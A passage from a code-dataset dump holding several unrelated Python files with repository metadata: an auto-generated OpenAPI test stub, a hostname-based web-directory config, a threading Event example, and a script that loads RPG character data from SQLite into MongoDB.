The version of the OpenAPI document: 1.1.3
Contact: support@relational.ai
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import rai_api
from rai_api.model.cons_all_of import ConsAllOf
from rai_api.model.linked_list import LinkedList
from rai_api.model.syntax_node import SyntaxNode
globals()['ConsAllOf'] = ConsAllOf
globals()['LinkedList'] = LinkedList
globals()['SyntaxNode'] = SyntaxNode
from rai_api.model.cons import Cons
class TestCons(unittest.TestCase):
"""Cons unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCons(self):
"""Test Cons"""
# FIXME: construct object with mandatory attributes with example values
# model = Cons() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"helmiinour@gmail.com"
] |
helmiinour@gmail.com
|
9b57f8a69b3a2a57d25b3c849795e6816bdaf79f
|
34cc1aeb6f7d0e612026905d12c85aeea989a83a
|
/host.py
|
ea56c1dc1b3f7bead8cf4ca8fd139af5b8e6233d
|
[] |
no_license
|
mverzett/.bin
|
83de7c0c0c16d75ca39df6c5ed95957f4ec79f9a
|
a1b652f5660c07690f61e79793372ad7e9d6099d
|
refs/heads/master
| 2021-01-18T15:05:42.366559
| 2019-07-11T17:51:05
| 2019-07-11T17:51:05
| 8,330,975
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 755
|
py
|
import os
host = os.environ['HOSTNAME']
public_html = ''
root_dir = ''
web_home = ''
#Site-dependent information
if 'wisc' in host:
public_html = '/afs/hep.wisc.edu/home/%s/public_html/' % os.environ['USER']
root_dir = 'public_html'
web_home = 'http://www.hep.wisc.edu/~mverzett'
elif 'cern.ch' in host:
initial = os.environ['USER'][0]
public_html = '/afs/cern.ch/user/%s/%s/www/' % (initial, os.environ['USER'])
root_dir = 'www'
web_home = 'https://mverzett.web.cern.ch/mverzett'
elif 'fnal.gov' in host:
public_html = os.path.join(os.environ['HOME'],'public_html')
root_dir = 'public_html'
web_home = 'http://home.fnal.gov/~%s' % os.environ['USER']
else:
raise ValueError("Site %s not recongnised!" % host)
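# Example (hypothetical): on a CERN lxplus node HOSTNAME contains 'cern.ch',
# so USER='mverzett' yields public_html = '/afs/cern.ch/user/m/mverzett/www/'.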
|
[
"mverzett@cern.ch"
] |
mverzett@cern.ch
|
c34762a2d3793cb0cfb3c1d72c81137d5420837e
|
663c108dca9c4a30b7dfdc825a8f147ba873da52
|
/venv/multithreading/56InterThreadComEventObjectRemoveConsumerSleep.py
|
b926cace99d531efc0f3c545ed4a68c5d8f0d0b3
|
[] |
no_license
|
ksrntheja/08-Python-Core
|
54c5a1e6e42548c10914f747ef64e61335e5f428
|
b5fe25eead8a0fcbab0757b118d15eba09b891ba
|
refs/heads/master
| 2022-10-02T04:11:07.845269
| 2020-06-02T15:23:18
| 2020-06-02T15:23:18
| 261,644,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
from threading import *
import time
def producer(event):
print("Producer thread producing items:")
print("Producer thread giving notification by setting event")
event.set()
def consumer(event):
print('Consumer sleeping')
time.sleep(3)
    print(t1.name, 'is active:', t1.is_alive())  # getName()/isAlive() are deprecated/removed in Python 3
print("Consumer thread is waiting for updation")
event.wait()
print("Consumer thread got notification and consuming items")
event = Event()
t1 = Thread(target=producer, args=(event,))
t2 = Thread(target=consumer, args=(event,))
t2.start()
t1.start()
# Consumer sleeping
# Producer thread producing items:
# Producer thread giving notification by setting event
# Thread-1 is active: False
# Consumer thread is waiting for updation
# Consumer thread got notification and consuming items
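# A defensive variant (a sketch, not in the original): wait with a timeout so
# the consumer cannot block forever if the producer never sets the event:
# if not event.wait(timeout=10):
#     print("Timed out waiting for the producer")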
|
[
"srntkolla@gmail.com"
] |
srntkolla@gmail.com
|
be3ca6a59c8af3295105d05abd669f9eb2c92d43
|
b042a014d668bd2d9e07bcfc756022137e5b0f97
|
/module3-nosql-and-document-oriented-databases/assignment3.py
|
2489aa19f8091748835faafd36ce7732de8ef74d
|
[
"MIT"
] |
permissive
|
JeffreyAsuncion/DS-Unit-3-Sprint-2-SQL-and-Databases
|
82895211b55b08b99e9c9c426f37cb04ba6f57c6
|
5d22fe0e2dd09c4130232b5f17c52e271d9b7f6b
|
refs/heads/master
| 2022-11-24T10:48:13.916529
| 2020-08-01T05:06:58
| 2020-08-01T05:06:58
| 281,016,493
| 0
| 0
| null | 2020-07-20T04:51:39
| 2020-07-20T04:51:39
| null |
UTF-8
|
Python
| false
| false
| 1,557
|
py
|
# Store RPG data in our MongoDB instance
import os
import sqlite3
import pandas as pd
import pymongo
from dotenv import load_dotenv
from pymongo import MongoClient
from pdb import set_trace as breakpoint
#
# Part One: get data from 1. Sqlite or 2. Postgresql
#
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "rpg_db.sqlite3")
connection = sqlite3.connect(DB_FILEPATH)
print("CONNECTION:", connection)
cursor = connection.cursor()
print("CURSOR", cursor)
query = "SELECT * FROM charactercreator_character;"
results = cursor.execute(query).fetchall()
# print("RESULT", results) #> returns cursor object w/o results (need to fetch the results)
# print("type:", type(results))
#
# Prepare df
#
columns = ['character_id', 'name', 'level', 'exp', 'hp', 'strength', 'intelligence', 'dexterity', 'wisdom']
rpg_df = pd.DataFrame(results, columns=columns)
print(rpg_df.head())
#
# TODO: result to dict
#
rpg_dict = rpg_df.to_dict('records')
#
# TODO: create and insert to mongoDB
#
load_dotenv()
DB_USER = os.getenv("MONGO_USER", default="OOPS")
DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS")
CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS")
connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}.mongodb.net/test?retryWrites=true&w=majority"
print("\n----------------")
print("URI:", connection_uri)
client = pymongo.MongoClient(connection_uri)
#
# TODO: db.collection.insertMany({})
#
db = client.rpg_database
collection = db.charactercreator_character
collection.insert_many(rpg_dict)
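# A quick sanity check (a sketch; count_documents requires pymongo >= 3.7):
# print("Inserted docs:", collection.count_documents({}))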
|
[
"jeffrey.l.asuncion@gmail.com"
] |
jeffrey.l.asuncion@gmail.com
|